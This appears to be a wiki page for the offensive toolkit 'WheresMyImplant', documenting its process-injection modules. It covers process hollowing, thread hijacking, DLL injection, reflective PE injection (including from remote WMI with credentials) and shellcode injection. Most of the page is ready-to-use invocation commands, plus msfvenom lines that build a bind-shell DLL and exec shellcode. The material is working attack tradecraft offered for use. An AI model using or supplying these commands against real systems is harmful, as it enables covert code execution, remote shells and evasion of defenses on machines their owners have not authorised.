-
Notifications
You must be signed in to change notification settings - Fork 58
Process Injection Modules
Note: Providing a zero length or blank string for the process ID will cause the method to inject into the current process
This technique starts a suspended process, then overwrites the suspended process with a new PE and continues execution.
[WheresMyImplant.Injection]::HollowProcess("notepad.exe", "meterpreter.exe")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,HollowProcess notepad.exe,meterpreter.exe
This technique suspends the main thread of a process, alters the thread context so that the next executed instruction on the cpu register to point to our shellcode, and resumes the thread. After shellcode has finished executing, the original execution context is restored and the process resumes as normal.
[WheresMyImplant.Injection]::HijackThread("495", $shellcode)
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,HijackThread 495,<shellcode>
This technique creates a new thread in a process that calls LoadLibrary from kernel32 injecting the DLL into the remote process. Note: This is not reflective DLL Injection - that is covered in InjectPE
msfvenom -p windows/x64/shell_bind_tcp --format dll --arch x64 > /tmp/bind64.dll
[WheresMyImplant.Injection]::LoadDll("495", "C:\evil.dll")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,LoadDll "495","C:\evil.dll"
This technique reflectively loads a PE in a process by allocating space in the process, adjusting the PE instruction offsets, and starts execution of the PE in a new thread.
[WheresMyImplant.Injection]::InjectPE("495", "C:\evil.exe", "arg1, arg2")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectPE "495","C:\evil.dll"
This technique reflectively loads a PE in a process by allocating space in the process, adjusting the PE instruction offsets, and starts execution of the PE in a new thread. The implementation reads in the PE from a base64 encoded string containing the bytes.
[WheresMyImplant.Injection]::InjectPEString("495", $base64PE, "arg1, arg2")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectPEString "495","<peString>,"arg1, arg2"
This technique reflectively loads a PE in a process by allocating space in the process, adjusting the PE instruction offsets, and starts execution of the PE in a new thread. The implementation reads in the PE from a base64 encoded string stored in WMI.
[WheresMyImplant.Injection]::InjectPEStringWMIFS("495", "WMIClassName", "FileName", "arg1, arg2")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectPEStringWMIFS "495","WMIClassName","FileName","arg1, arg2"
This technique reflectively loads a PE in a process by allocating space in the process, adjusting the PE instruction offsets, and starts execution of the PE in a new thread. The implementation reads in the PE from a base64 encoded string stored in a remote WMI instance.
[WheresMyImplant.Injection]::InjectPEStringWMIFSWMIFSRemote("495", "WMIClassName", "Username, "Password", "Filename", "arg1, arg2")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectPEStringWMIFSWMIFSRemote "495","WMIClassName","Username,"Password","Filename","arg1, arg2"
This technique allocates space in a process, writes the bytes, and creates a new thread on the allocated space, executing the shellcode. Note: The Shellcode is read as base64 encoded string.
msfvenom -p windows/x64/exec --format csharp CMD=calc.exe | base64
[WheresMyImplant.Injection]:: InjectShellCode("", $shellcode)
[WheresMyImplant.Injection]:: InjectShellCode("495", $shellcode)
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectShellCode "",<shellcode>
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectShellCode "495",<shellcode>
This technique allocates space in a process, writes the bytes, and creates a new thread on the allocated space, executing the shellcode. he implementation reads in the shellcode from a base64 encoded string stored in WMI instance.
msfvenom -p windows/x64/exec --format csharp CMD=calc.exe | base64
[WheresMyImplant.Injection]:: InjectShellCodeWMIFS("495", "WMIClassName", "ShellCodeName")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Injection,InjectShellCodeWMIFS "495","WMIClassName", "ShellCodeName"